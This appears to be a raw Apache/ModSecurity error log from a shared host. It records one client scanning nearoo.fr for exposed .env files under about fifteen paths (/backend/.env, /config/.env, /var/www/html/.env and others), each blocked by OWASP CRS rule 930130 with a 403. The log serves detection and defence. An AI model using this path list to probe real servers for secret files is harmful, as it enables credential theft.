[Mon May 11 17:35:58.376484 2026] [security2:error] [pid 1411201:tid 1411247] [client 18.144.25.17:59174] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "nearoo.fr"] [uri "/backend/.env"] [unique_id "agH3Xvy_GXSWIKeli0sNZgAAAIE"]
[Mon May 11 17:35:58.376748 2026] [security2:error] [pid 1411201:tid 1411247] [client 18.144.25.17:59174] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "nearoo.fr"] [uri "/backend/.env"] [unique_id "agH3Xvy_GXSWIKeli0sNZgAAAIE"]
[Mon May 11 17:35:58.604543 2026] [security2:error] [pid 1411201:tid 1411247] [client 18.144.25.17:59174] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /server/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "nearoo.fr"] [uri "/server/.env"] [unique_id "agH3Xvy_GXSWIKeli0sNaAAAAIE"]
[Mon May 11 17:35:58.604771 2026] [security2:error] [pid 1411201:tid 1411247] [client 18.144.25.17:59174] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "nearoo.fr"] [uri "/server/.env"] [unique_id "agH3Xvy_GXSWIKeli0sNaAAAAIE"]
[Mon May 11 17:35:58.605017 2026] [security2:error] [pid 1411201:tid 1411247] [client 18.144.25.17:59174] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "nearoo.fr"] [uri "/server/.env"] [unique_id "agH3Xvy_GXSWIKeli0sNaAAAAIE"]
[Mon May 11 17:35:58.718661 2026] [authz_core:error] [pid 1411055:tid 1411057] [client 176.120.22.46:58782] AH01630: client denied by server configuration: /home/labaujue/public_html/wp-includes/sodium_compat/src/Core32/error_log, referer: http://www.labaujue.com/wp-includes/sodium_compat/src/Core32/
[Mon May 11 17:35:58.838098 2026] [security2:error] [pid 1411201:tid 1411247] [client 18.144.25.17:59174] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /frontend/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "nearoo.fr"] [uri "/frontend/.env"] [unique_id "agH3Xvy_GXSWIKeli0sNaQAAAIE"]
[Mon May 11 17:35:58.838279 2026] [security2:error] [pid 1411201:tid 1411247] [client 18.144.25.17:59174] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "nearoo.fr"] [uri "/frontend/.env"] [unique_id "agH3Xvy_GXSWIKeli0sNaQAAAIE"]
[Mon May 11 17:35:58.838507 2026] [security2:error] [pid 1411201:tid 1411247] [client 18.144.25.17:59174] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "nearoo.fr"] [uri "/frontend/.env"] [unique_id "agH3Xvy_GXSWIKeli0sNaQAAAIE"]
[Mon May 11 17:35:59.057525 2026] [security2:error] [pid 1411201:tid 1411247] [client 18.144.25.17:59174] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /src/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "nearoo.fr"] [uri "/src/.env"] [unique_id "agH3X_y_GXSWIKeli0sNagAAAIE"]
[Mon May 11 17:35:59.057772 2026] [security2:error] [pid 1411201:tid 1411247] [client 18.144.25.17:59174] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "nearoo.fr"] [uri "/src/.env"] [unique_id "agH3X_y_GXSWIKeli0sNagAAAIE"]
[Mon May 11 17:35:59.058048 2026] [security2:error] [pid 1411201:tid 1411247] [client 18.144.25.17:59174] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "nearoo.fr"] [uri "/src/.env"] [unique_id "agH3X_y_GXSWIKeli0sNagAAAIE"]
[Mon May 11 17:35:59.319990 2026] [security2:error] [pid 1411201:tid 1411247] [client 18.144.25.17:59174] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /core/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "nearoo.fr"] [uri "/core/.env"] [unique_id "agH3X_y_GXSWIKeli0sNawAAAIE"]
[Mon May 11 17:35:59.320236 2026] [security2:error] [pid 1411201:tid 1411247] [client 18.144.25.17:59174] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "nearoo.fr"] [uri "/core/.env"] [unique_id "agH3X_y_GXSWIKeli0sNawAAAIE"]
[Mon May 11 17:35:59.320470 2026] [security2:error] [pid 1411201:tid 1411247] [client 18.144.25.17:59174] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "nearoo.fr"] [uri "/core/.env"] [unique_id "agH3X_y_GXSWIKeli0sNawAAAIE"]
[Mon May 11 17:35:59.534704 2026] [security2:error] [pid 1411201:tid 1411247] [client 18.144.25.17:59174] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /core/app/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "nearoo.fr"] [uri "/core/app/.env"] [unique_id "agH3X_y_GXSWIKeli0sNbAAAAIE"]
[Mon May 11 17:35:59.534935 2026] [security2:error] [pid 1411201:tid 1411247] [client 18.144.25.17:59174] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "nearoo.fr"] [uri "/core/app/.env"] [unique_id "agH3X_y_GXSWIKeli0sNbAAAAIE"]
[Mon May 11 17:35:59.535188 2026] [security2:error] [pid 1411201:tid 1411247] [client 18.144.25.17:59174] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "nearoo.fr"] [uri "/core/app/.env"] [unique_id "agH3X_y_GXSWIKeli0sNbAAAAIE"]
[Mon May 11 17:35:59.851783 2026] [security2:error] [pid 1411201:tid 1411247] [client 18.144.25.17:59174] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /config/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "nearoo.fr"] [uri "/config/.env"] [unique_id "agH3X_y_GXSWIKeli0sNbgAAAIE"]
[Mon May 11 17:35:59.852042 2026] [security2:error] [pid 1411201:tid 1411247] [client 18.144.25.17:59174] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "nearoo.fr"] [uri "/config/.env"] [unique_id "agH3X_y_GXSWIKeli0sNbgAAAIE"]
[Mon May 11 17:35:59.852360 2026] [security2:error] [pid 1411201:tid 1411247] [client 18.144.25.17:59174] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "nearoo.fr"] [uri "/config/.env"] [unique_id "agH3X_y_GXSWIKeli0sNbgAAAIE"]
[Mon May 11 17:36:00.022349 2026] [security2:error] [pid 1411201:tid 1411247] [client 18.144.25.17:59174] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /private/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "nearoo.fr"] [uri "/private/.env"] [unique_id "agH3YPy_GXSWIKeli0sNbwAAAIE"]
[Mon May 11 17:36:00.022598 2026] [security2:error] [pid 1411201:tid 1411247] [client 18.144.25.17:59174] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "nearoo.fr"] [uri "/private/.env"] [unique_id "agH3YPy_GXSWIKeli0sNbwAAAIE"]
[Mon May 11 17:36:00.022835 2026] [security2:error] [pid 1411201:tid 1411247] [client 18.144.25.17:59174] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "nearoo.fr"] [uri "/private/.env"] [unique_id "agH3YPy_GXSWIKeli0sNbwAAAIE"]
[Mon May 11 17:36:00.244741 2026] [security2:error] [pid 1411201:tid 1411247] [client 18.144.25.17:59174] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /application/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "nearoo.fr"] [uri "/application/.env"] [unique_id "agH3YPy_GXSWIKeli0sNcQAAAIE"]
[Mon May 11 17:36:00.244993 2026] [security2:error] [pid 1411201:tid 1411247] [client 18.144.25.17:59174] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "nearoo.fr"] [uri "/application/.env"] [unique_id "agH3YPy_GXSWIKeli0sNcQAAAIE"]
[Mon May 11 17:36:00.245244 2026] [security2:error] [pid 1411201:tid 1411247] [client 18.144.25.17:59174] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "nearoo.fr"] [uri "/application/.env"] [unique_id "agH3YPy_GXSWIKeli0sNcQAAAIE"]
[Mon May 11 17:36:00.534023 2026] [security2:error] [pid 1411201:tid 1411247] [client 18.144.25.17:59174] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /bootstrap/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "nearoo.fr"] [uri "/bootstrap/.env"] [unique_id "agH3YPy_GXSWIKeli0sNcgAAAIE"]
[Mon May 11 17:36:00.534459 2026] [security2:error] [pid 1411201:tid 1411247] [client 18.144.25.17:59174] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "nearoo.fr"] [uri "/bootstrap/.env"] [unique_id "agH3YPy_GXSWIKeli0sNcgAAAIE"]
[Mon May 11 17:36:00.534970 2026] [security2:error] [pid 1411201:tid 1411247] [client 18.144.25.17:59174] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "nearoo.fr"] [uri "/bootstrap/.env"] [unique_id "agH3YPy_GXSWIKeli0sNcgAAAIE"]
[Mon May 11 17:36:00.730991 2026] [security2:error] [pid 1411201:tid 1411247] [client 18.144.25.17:59174] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /database/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "nearoo.fr"] [uri "/database/.env"] [unique_id "agH3YPy_GXSWIKeli0sNcwAAAIE"]
[Mon May 11 17:36:00.731251 2026] [security2:error] [pid 1411201:tid 1411247] [client 18.144.25.17:59174] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "nearoo.fr"] [uri "/database/.env"] [unique_id "agH3YPy_GXSWIKeli0sNcwAAAIE"]
[Mon May 11 17:36:00.731510 2026] [security2:error] [pid 1411201:tid 1411247] [client 18.144.25.17:59174] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "nearoo.fr"] [uri "/database/.env"] [unique_id "agH3YPy_GXSWIKeli0sNcwAAAIE"]
[Mon May 11 17:36:00.909782 2026] [security2:error] [pid 1411201:tid 1411247] [client 18.144.25.17:59174] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /storage/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "nearoo.fr"] [uri "/storage/.env"] [unique_id "agH3YPy_GXSWIKeli0sNdQAAAIE"]
[Mon May 11 17:36:00.910006 2026] [security2:error] [pid 1411201:tid 1411247] [client 18.144.25.17:59174] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "nearoo.fr"] [uri "/storage/.env"] [unique_id "agH3YPy_GXSWIKeli0sNdQAAAIE"]
[Mon May 11 17:36:00.910265 2026] [security2:error] [pid 1411201:tid 1411247] [client 18.144.25.17:59174] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "nearoo.fr"] [uri "/storage/.env"] [unique_id "agH3YPy_GXSWIKeli0sNdQAAAIE"]
[Mon May 11 17:36:01.222279 2026] [security2:error] [pid 1411201:tid 1411247] [client 18.144.25.17:59174] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /var/www/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "nearoo.fr"] [uri "/var/www/.env"] [unique_id "agH3Yfy_GXSWIKeli0sNdgAAAIE"]
[Mon May 11 17:36:01.222512 2026] [security2:error] [pid 1411201:tid 1411247] [client 18.144.25.17:59174] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "nearoo.fr"] [uri "/var/www/.env"] [unique_id "agH3Yfy_GXSWIKeli0sNdgAAAIE"]
[Mon May 11 17:36:01.222756 2026] [security2:error] [pid 1411201:tid 1411247] [client 18.144.25.17:59174] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "nearoo.fr"] [uri "/var/www/.env"] [unique_id "agH3Yfy_GXSWIKeli0sNdgAAAIE"]
[Mon May 11 17:36:01.416510 2026] [security2:error] [pid 1411201:tid 1411247] [client 18.144.25.17:59174] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /var/www/html/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "nearoo.fr"] [uri "/var/www/html/.env"] [unique_id "agH3Yfy_GXSWIKeli0sNdwAAAIE"]
[Mon May 11 17:36:01.416735 2026] [security2:error] [pid 1411201:tid 1411247] [client 18.144.25.17:59174] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "nearoo.fr"] [uri "/var/www/html/.env"] [unique_id "agH3Yfy_GXSWIKeli0sNdwAAAIE"]
